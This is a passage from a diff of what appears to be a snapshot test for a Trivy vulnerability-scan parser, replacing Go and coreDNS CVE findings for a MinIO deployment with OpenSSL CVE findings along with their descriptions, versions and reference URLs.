"value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2835", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2835", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", - "https://github.com/advisories/GHSA-ch7v-37xg-75ph", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", - "https://www.cve.org/CVERecord?id=CVE-2022-2835", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "coreDNS: DNS Redirection of Internal Services", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2835", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2835", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", + "value": "https://bugzilla.redhat.com/2164487", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-2837", - "installedVersion": "v1.9.3", - "packageName": "github.com/coredns/coredns", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-2837", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", - "https://github.com/advisories/GHSA-h828-v5pv-33qx", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", - "https://www.cve.org/CVERecord?id=CVE-2022-2837", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "DNS Redirection of Top-Level Domains", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2837", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2837", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.28.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-33955", - "installedVersion": "v0.20.0", - "packageName": "github.com/minio/console", - "references": [ - "https://github.com/advisories/GHSA-jv3f-7m33-qp65", - "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", - "https://github.com/minio/console/releases/tag/v0.28.0", - "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", - "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", - ], - }, - "category": "Vulnerability", - "description": "Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. - -", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-33955", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://github.com/minio/console/releases/tag/v0.28.0", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + 